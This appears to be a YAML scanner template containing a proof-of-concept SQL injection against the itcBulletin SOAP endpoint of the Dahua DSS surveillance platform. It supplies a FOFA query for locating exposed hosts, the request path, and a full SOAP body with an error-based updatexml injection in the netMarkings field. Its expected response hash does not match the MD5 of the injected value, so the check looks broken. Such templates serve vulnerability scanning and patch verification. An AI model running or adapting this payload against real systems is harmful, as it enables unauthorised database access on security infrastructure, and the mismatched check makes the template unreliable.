product: 大华DSS城市安防监控平台
vName: 大华DSS城市安防监控平台 itcBulletin SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 大华DSS城市安防监控平台itcBulletin接口存在SQL注入漏洞，攻击者可以利用该漏洞获取数据库敏感信息。
version: ''
note: ''
search:
  FOFA: app="dahua-DSS"
protocol: http
link: https://github.com/wy876/POC/blob/main/%E5%A4%A7%E5%8D%8E/%E5%A4%A7%E5%8D%8EDSS%20itcBulletin%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /portal/services/itcBulletin?wsdl
      data: "<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>\n\
      \  <s11:Body>\n    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>\n\
      \      <netMarkings>\n        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1)))\
      \ and (1=1\n      </netMarkings>\n    </ns1:deleteBulletin>\n  </s11:Body>\n\
      </s11:Envelope>"
    verify:
      path: ''
      logic: and
      check:
        - status: 500
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and